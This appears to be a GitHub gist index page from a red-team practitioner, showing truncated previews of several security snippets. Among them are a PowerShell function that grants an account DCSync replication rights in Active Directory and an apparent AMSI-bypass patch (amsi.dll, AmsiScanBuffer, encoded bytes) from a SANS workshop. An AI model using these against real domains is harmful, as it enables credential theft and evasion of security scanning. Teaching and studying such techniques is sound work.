
jfmaes / functionextract.py
Created April 26, 2023 07:35
MSDN function definition scraper. Requires chromium driver.
import argparse
import selenium as se
from selenium import webdriver
from bs4 import BeautifulSoup
import time
def main():
parser = argparse.ArgumentParser(description = 'extract function definitions from MSDN')
parser.add_argument('--methods', help='list of methods',required=True)
args = parser.parse_args()
#methods_list = []
jfmaes / jumps.txt
Created October 19, 2022 14:35
dont even ask.
ntdll.dll
DbgQueryDebugFilterState from ntdll.dll
DbgQueryDebugFilterState from ntdll.dll
DbgQueryDebugFilterState from ntdll.dll
DbgSetDebugFilterState from ntdll.dll
EtwpGetCpuSpeed from ntdll.dll
LdrAccessResource from ntdll.dll
LdrCallEnclave from ntdll.dll
LdrProcessRelocationBlockEx from ntdll.dll
NtQuerySystemTime from ntdll.dll
jfmaes / Invoke-SyncMeUp.ps1
Created February 26, 2022 10:28
Invoke-SyncMeUp.ps1
function Invoke-SyncMeUp{
[CmdletBinding()]
Param (
[Parameter(Mandatory=$True)]
[string]$AccountName
)
$dse = [ADSI]"LDAP://Rootdse"
$namingcontext = $dse.defaultNamingContext
echo "Giving $AccountName DCSync rights"
dsacls.exe $namingcontext /G $AccountName":CA;Replicating Directory Changes All" $AccountName":CA;Replicating Directory Changes"
jfmaes / ipexploder.py
Created January 27, 2022 11:41
explode ips
import argparse
from ipaddress import IPv4Network
import os
def banner():
print(r"""
c=====e
H
____________ _,,_H____
jfmaes / SANSReflection.txt
Created October 4, 2021 11:59
Register for the SEC699 ;-)
Hi SANS Workshop Attendees! Reflection is super fun!
amsi.dll
AmsiScanBuffer
uFcAB4DD
jfmaes / ssl-scraper.py
Last active September 10, 2021 16:52
extract hostnames based on SSL certificates
#!/usr/bin/python
import requests
from socket import *
from requests.packages.urllib3.contrib import pyopenssl as reqs
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silence urllib3's InsecureRequestWarning for the whole process. urllib3 emits
# that warning when an HTTPS request is made without certificate verification.
# NOTE(review): presumably the scraper connects with verification disabled so it
# can read certificates from hosts with untrusted or self-signed chains -- confirm
# against the request calls further down. With the warning off, nothing at runtime
# signals that responses are unauthenticated, so treat any data fetched this way
# as untrusted and do not reuse this setup in code that relies on TLS validation.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import argparse
import ipaddress
#import asyncio
jfmaes / .htaccess
Created March 23, 2021 12:19 — forked from curi0usJack/.htaccess
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-available/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
jfmaes / AppDomainResolveTest.cs
Created December 21, 2020 09:53
example ingestor of NvisoLib for the blogpost
using System;
using NvisoLib;
using System.Reflection;
namespace AppDomainResolveTest
{
class Program
{
static void Main(string[] args)
{
jfmaes / reflectiondemo.ps1
Created December 21, 2020 09:09
Sample Reflection of the HelloFromDotNetFramework assembly for the blogpost
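# Demo: load the HelloFromDotNetFramework assembly from a byte array and call
# its entry point through reflection.
#
# Assembly.Load(byte[]) maps the image from memory rather than from a file path,
# so the loaded module is not tied to the file it was read from. For defenders:
# on .NET Framework 4.8 and later, byte-array loads are submitted to AMSI, and
# the Microsoft-Windows-DotNETRuntime ETW provider reports assembly-load events,
# so this pattern stays observable even when no new file is written to disk.
clear

# Read the compiled sample as raw bytes (path is specific to the author's machine).
$bytes = [System.IO.File]::ReadAllBytes("C:\Users\jeanm\source\repos\HelloFromDotNetFramework\bin\Release\HelloFromDotNetFramework.exe")

# Loading has the side effect of making the assembly's types resolvable by name
# in this session; $asm itself is kept for inspection.
$asm = [System.Reflection.Assembly]::Load($bytes)

# Main takes a string[]. The original `{null}` was a script-block literal, which
# PowerShell would coerce to a one-element array holding the text "null"; an
# explicit empty string array passes "no arguments" as intended.
[string[]]$params = @()
[HelloFromDotNetFramework.Program]::Main($params)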
jfmaes / HelloFromDotNetFramework.cs
Last active December 20, 2020 21:53
Sample Hello World for blogpost
using System;
using System.Reflection;
namespace HelloFromDotNetFramework
{
public class Program
{
public static void Main(string[] args)
{
Console.WriteLine("Hi from {0}", Assembly.GetExecutingAssembly());